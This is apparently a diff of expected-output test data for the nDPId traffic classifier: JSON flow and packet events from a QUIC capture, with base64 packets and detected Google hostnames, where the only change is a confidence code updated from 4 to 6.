00632{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425498439,"flow_last_seen":1621425498439,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"251.236.18.198","src_port":44252,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1621425498439,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621425498439,"pkt":"AAAAAAAAAAEAYl3ZCABFAAVi7ahAAEAR4FYKdU5k++wSxqzcAbsFTidpxP8AAB0Id06oCGAS\/SQAAEU0ed34HhSjMqu3wM3rp8Z7ywfKnATeCO1KNQbG+Q1AYYt5I2GKbEI4LPmTF\/Dg8oRvZW7+Hps\/zeWj4mRYkEWQqTJ1jKptKM4UEpyPZZwThhNGXqmj6pg6xKApWE\/oyF9g97k8sBAbAFjDVYEhNEZijtx\/4YuODy3D9E7bPZxpgcPMwpkKYui5mIAEgbi8+Rn0i3hcxUwY7q57V8pjWYX7+ImwcGnArVGy1OpvIF+ketJD73EkvbYzvYqF\/dx7vL5C3WdaRiA9Mfj4FAMj0RdomtiauTwZ9tZGvrn5iZc92HxM4jvRW53IfC7AsWzDXs2r5WAp0EASs6EpiisrRUGhmoOMYgx78xwP+jWjx1XXxbRaJ2HQc1mG\/NdnL1nuvR8nTgTtoDWHE51rI8jwmgCKy\/MRsXgdRCTYt8oDCgeFipZsTgwY7S+w9r+p5dQqS7ggXdDcdXTMpzrMFGpZUtfmnyOuFY8EUJBOZtyPVfAgZ2J9lHR4O7H0HFN20uv52\/nqryE+o15lojuNbE7xE6hnJRxYacEhTZ+adxZvTe3ZbcZp+ArC5OwrDguig7jjNBMIHugEUzqkfH\/jaFQLD8JFWvrgHaj8qu5B5PjtqF5oB1qsGzCGjGh1UBZltV0pg4iY3Fee6NHV1exKrosArB\/8w\/C5lj6qgKibGsNPFBHUDqfs6Jz8s6FD8M0RwKxS0XYvh4HQDhIs8KDnCgCOc5ZqpGzAxWE2sFtQm1X9ZdTNBYdCxTR75QqGKVUyAwDY6MS5DrXKqWXB4m86kt3QfAFZUD0r04ROd5Iy0wrnwdGHMkbwXSsDDW5fdt4YYwn\/mhfO7TJ4ZKBrSJ5T+p8gpO0GzoZC+lIbATWgjqE\/P\/wDIp6NdKYeA+8geSI7YZP4nWfDgSoIHZphZHbocFnUUiNrBJ+JtQJCV1GcW2T5EMvwWWQ+zc5iC76n0qfV0F8WZ0UcVFvIhbjTEkm5tN09Sz35bubHZC7borBe9wGaBdUWuvbDKcYxKkDlCqHQh6sGHMEZvO8ITeoApd4s+sy32VthAMZfwzAkcp543Nd9arJlBQRns5ovQ74CEqV\/1SFXZ6AcxWiYbvYtKsu\/PXbKxEWRX\/bLqtCaRALrGa7LpwKvTT+nAPIfY1QuCMkJVs1njoj7EW\/n+6IFSplTtx1+YI+f46mZhIFNeEaX2QhADqN3oRrKwNDIyXpLg42uHmw6eyK87UJQsPtU8fbi0YLvgdhwLKYwc26rmYVcgZA2atbyib2Uj5alm78AkDkA5B6DNcz26jK7Xdi7HuV2TaALNudIatJBaYrNO2BlOvKywUaBJyggz39eP2g7XmeWd3aYE1aVTmJh\/X5Qlrz9C2EIg7WTIcETGQEy8F90A79pH7Soo5GcuPSyFrXtm5pfyZ8ekVtDas4uVjKMf\/55+t6uPRCl+GGDV091JgGbVqRR+qTbedv71GzRsoHrnHdTCw0\/6n5hRMqNjCHohMyyw+z8G1vmqSYMeQSMcWwzZON\/Jpnf2+CCqG3a7qlN1pPPkFyQhCllDNBRGdLWESKJhwxAioLHXjcdaXMywR8L7AS4Q2pkh1vrE4OB5IkU5Akg+78J9kzElSj\/7UWmlJ1BP49+zt9iG1OkS+1eOA9H1HXTQnB3rdU7jlLnCc+mS9YO5piXufWtmGBMHav\/cH2i1z7Nj\/YeOefBJDB6J9Vay5mTPGEHAWOZWU35b1ecCTk0q59LDDSBSuCpCzIgENLQ9BsmRpTJ1p\/5t5pYrOotQhCsIUt4ZYseRcaE"} -00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425498439,"flow_last_seen":1621425498439,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"251.236.18.198","src_port":44252,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"accounts.google.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; STK-L21","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621421253470,"flow_last_seen":1621421253804,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"212.22.246.243","src_port":55376,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621421253509,"flow_last_seen":1621421253809,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"133.202.76.105","src_port":64964,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621421260215,"flow_last_seen":1621421260513,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"37.47.218.224","src_port":59827,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} -00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621421316093,"flow_last_seen":1621421316389,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"241.138.147.133","src_port":51053,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} -00739{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621421257105,"flow_last_seen":1621421257105,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"112.1.105.138","src_port":55844,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} +00927{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":18,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425498439,"flow_last_seen":1621425498439,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"251.236.18.198","src_port":44252,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"accounts.google.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; STK-L21","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621421253470,"flow_last_seen":1621421253804,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"212.22.246.243","src_port":55376,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621421253509,"flow_last_seen":1621421253809,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"133.202.76.105","src_port":64964,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} +00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621421260215,"flow_last_seen":1621421260513,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"37.47.218.224","src_port":59827,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} +00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1621421316093,"flow_last_seen":1621421316389,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":2700,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"241.138.147.133","src_port":51053,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} +00739{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621421257105,"flow_last_seen":1621421257105,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425498439,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"112.1.105.138","src_port":55844,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.PlayStore","breed":"Safe","category":"SoftwareUpdate"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425516873,"flow_last_seen":1621425516873,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425516873,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"202.152.155.121","src_port":55273,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1621425516873,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621425516873,"pkt":"AAAAAAAAAAEAaACzCABFAAVi\/6ZAAEARdvkKdU5kypibedfpAbsFTqmnyf8AAB0IsJwtqP2LOOwAAEU0PbMNV+Nmu5DIBUiD5lV4SUmkAFIOJpUhquUbkJoyjAxBM3gtgG81k6lhzA3GQE8tVB\/S296\/Vm2Zxaenrapxc2ryyJf3KX33MoNtBeSuxOyEjdN50pJD4IMrhuAo8nfxKG6fLj9F7lLvICTV\/vlkHUn8yq3RpGdoDFOYvOtuCt1zawf8weQRnfp4xT1kOhHEDxHVv3bNZbM5nRRJXxXGUaGOz22milo75Yy260QtHR4aoaeFIln1kEu0Lim1RK2gIG3MjkVIIfGYE828l6gKFLAUfvWyTEYYCubVd8+CKJEzaO\/afD6oH5Y+bKAztlPySihidV\/90CKHnjQSRTY+hapGYGfImwKn+7gwJ0y8ENI6zq2Ih7o8GVIuZBwsmgHPKVoI\/krv0+O9osznOQz68C3vRsk1lna2++Eh\/eGS6oVNvaQ9HWU8IOAO+hUpNSDAIpk8z853xu8BoWAYiv13BqICJAyIWzO+XisJ7ZDbQazmstS1X4Ro4beEy\/NpDmgrHs\/2pa7Zx6xAb0+3G7FsuNHBfazEIqD5ZaxPUSzBN2h9+9XzJ8MjsV2QQaUNPKl5I3TcN6uLucyXyzoKtyZvx5m9Myxjpit2V2hvKZoZMAufeIdZgn3bjdomXrscSN1kh89eZFiv+8sYO520yhiz9Evn\/LyuQ4s3jZpT\/D2t8PxQoF8xBbRM4zYc7mLtB7P7mWuCpbELISFHcTd1dWZWKO0foIWL29u+grT0xfq4G03G5Sdlh6g1Tl76tw8ffNRyJI3B1Zll6LpvOOT++553ZZZqQa3dmFoR3AuvZwf2iw+7omds46sgvQhiRN4h3ZF2B3hT0H553qSfJVf4VpupfglxjFiuInrFgySWKfAzXArMN+oCMOC4SKZEMeUovKPTvnb6vai123eTNft\/vwXrMQQqNDZKuK5WJP9n6bql9xt+K6gqLuWDibIsa7IxJZOdak6WDJKf6u4rc9CLeCfpZ+GDha\/Ykxp0z9I7MyUvNbVkIJM\/\/ALKQXgF9YFg335wWbGJ8oeev0cFKhtD7JCQbdZz00KdQoKXGN+waVJ8KTPJCUvnXb3d0W4Fg26R\/P47ckP8VwYPQ0fWuFNGOND8uFBwF\/d3ueP0Anz4sfSw9hA0aszUtBllmz+NjVBZMaAVseucfSE9+FWtSW\/KsQybDuj9Hdnq3g3OWz1pqPNSI+HFuqWF8kQGfGwENovGwhVwKpXQnz+0BZTlc82FjLmWo7drbFueC+RSI7H7oib+IE4+I2hWvpUn3YTZ1WyrdeA0MBi5AqQOhNsHHnx76MGBKrRzlZllpZzmHpoD\/tJSEv6IBAqZAZIHyZYvETkvTQebRoyNKdTyTMYAOlqQcbtY58suf6NwY93EpSSHoAyvs7u6S34KR7j2gnjKUKqgaZ32XDZAiXBl6uHxguSNnHz\/0gic4akOjaNW1y36lv+MwNLpamJSA75xsY0Ag\/ayv1tDPlRq0SFYoyH\/L4BlSlxyXIpBXn6HDmzCBeqGRk\/SbP7MBhn1lhwnTyawxEZ\/gU0YfWVdkDqqI72zLJMAeO\/wRg13JYd2UqEyV84a2Jfyk1r4cyt9C7F0rhWFGR205l4xStcaYSinxImLl2pCKe5S2JSrskLuMGU92EeDCBi302RtMnd+pZkhUc\/dfq97n6+ubGkMSI0oohIfiZeWDID8SxamWtQv5ESk0SKFBP\/pMhJHpgeg965DR9H2osi8d4eJR+qyOMZCz7jHyZcC9RS2+yrCjEv3U9YnBDp5bAPDFrSnEw7i"} -00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425516873,"flow_last_seen":1621425516873,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425516873,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"202.152.155.121","src_port":55273,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clients4.google.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; STK-L21","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00928{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621425516873,"flow_last_seen":1621425516873,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621425516873,"l3_proto":"ip4","src_ip":"10.117.78.100","dst_ip":"202.152.155.121","src_port":55273,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"clients4.google.com","user_agent":"dev Chrome\/92.0.4503.0 Android 10; STK-L21","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00598{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":20,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","packets-captured":20,"packets-processed":19,"total-skipped-flows":0,"total-l4-payload-len":25650,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":9,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":9,"total-idle-flows":7,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":47,"global_ts_msec":1621431299729} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":20,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431299729,"flow_last_seen":1621431299729,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431299729,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53404,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02308{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1621431299729,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621431299729,"pkt":"AAAAAAAAAAEAWIVLCABFAAVi+ktAAH4RGLyokEAFcfqJ89CcAbsFTkRlzP8AAB0IlfQu+B7a8qcAAEU0VAXtGbQ9llSdlBvWDRqBCRlkCr+wLAODpb6IkSqrNtQT0Fq+mFTNNcZuGPLGmtMQiTgX5ahNfvwc2wVeVnwpjQXgMuY9BTiBvljI8vW2WO7xkdJk5ldSQUgRVPQ66OOPIEevYhWr2qgdtK3s4RlbCBiOUHL2oc6mNd7wOVC5XPDLU15Pb1X9rKGpYODdHEw2PCdUqXQXbRHNCTvR++4cDKRlcnhpPvs6EU838tX9PcKuOpDKMkxV6FLY+fNJwo9tnmW2kblEbFsqwJpz\/\/Enxa34NjqtoZhoRtapSyZCnEvopODqREJ\/CbRey4CQrv2fnFjjq7IR9A9vEDzcPpksson3AN1P3XrLmYYoaUkTGHOgCdje7SEGLDVSb4npjqySIO7wN8vp5rSPM5nARZ1XOT9wXoHff7cCe+dyL08HzUnnLJyBinNLpzvNbCMm0QKhi69Iq30GgBOKJqAZysRaQ5GV4Mf0wvX77rFCRRa9yldcwD6XOuyQdNUHPUQ0mVgJn1umvmeNPG6nKZjJq\/KGBx7ctS+gpvFQ1y0aJegnLzsDI2wvLLmhR9R3DiAgytDTiAvkU65nFAyo+x3w4ph5M+o6WWzbbtjsrAAu780wrME3zeXVEG9zm\/D3uptFTZsQMrWiuAaPVLf96rTs6qYSSYT7sYTWl\/jdhLBcFgFDy19mw2Lkw0oDKrrArHJ7yFnHUJtANtQ21TmcvxB\/WIjHCz8GMrDUZLO4OL+1Z7DeRFozavYMggt1qJ8U9KCvWBAR23kR921lFVt6a6RAQr\/I7jLU7sxhNgbORnVRfOZ1MAqQI8IIaWCq4xYmb6WmBUSzoH5\/13r8jfLuzIL6b1\/1xuyK1tWaBwjxQ8cdpzOSdWlwWGTU85r1MWsmvvgBLQno8RQ+AAeZUXr\/6vclKA8Bkt5OZC6F\/+bo8hifoSORQrzeJzJJiiI5FanBwgqgIUFyRIOqxcbjrI0ERcNvwqyjkLLqGLsY7p23bRBCZkGYLR28zH0LBHV0E4a0nhRGBk0f+KMOczC6ffG4xUK4QqemNWTyR\/91lj1denqDLOozFi3s9mCEzX4+yJyt3koNWJYF5um+Cu3rUa5kiznDT4nkKCPucW47nzSCmVao4V886qRx5Fx0iQIhZYySPa1r\/WDeHAaJOfFYJVkJKXBVWbzBAEax6q6reJe4QC08bU5\/zqLbaU3p3TETZVXEWcMzHKQD+xmaiYax8+gqDaZYIyifU0NKnlhkl+knTdJdHOJGncWgecX7cZ8apFuaDFx8UDXeMSrVUMSg8izndsoloQROpF\/aZqcH\/OCBifGVJlyfDkwFvsOr8tK54nIg\/1cnqgMA7cZTlQOsYpxuCu2jMiDpXOfrkKeU1g7FA9f\/QLEQ71aZKG1rpKfo9DX1OvCkAat37rPibslfUdCAi0gtEzi+ed4jZsjTTtLfHjE42gsT3p0neSGtZDGwREWKTcya3MwMkr8y\/d3DdqmakPpf5GYFqWV3fR7TgU6cIOopkRSOcFKjDEWelXif4mHkRTG6rwTb+56lZ51kKqq1jDvERvqFEW5JginMwKZ\/lD3mwE4WQG\/o+y40DQu\/5PR3r5bhM1VHKHeN3CJnGug5p\/ZJp53IP681sF51Qt5pS8LzCO+rVnGa1rCOauVjEFEOyPp7wndr4g313ytaLKjzfjG8HveWQnAWD3q5pxGlBUxjPmLLEeKM1hHQLZMxXASZ2IisfUFkbyzFIAfCK09zSR6oQTD3gwuOcTrdJpdr\/4oePdnzAHWZa\/8h"} -00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431299729,"flow_last_seen":1621431299729,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431299729,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53404,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} +00946{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":20,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431299729,"flow_last_seen":1621431299729,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431299729,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":53404,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"update.googleapis.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} 00630{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621431301735,"flow_last_seen":1621431301735,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621431301735,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":53431,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 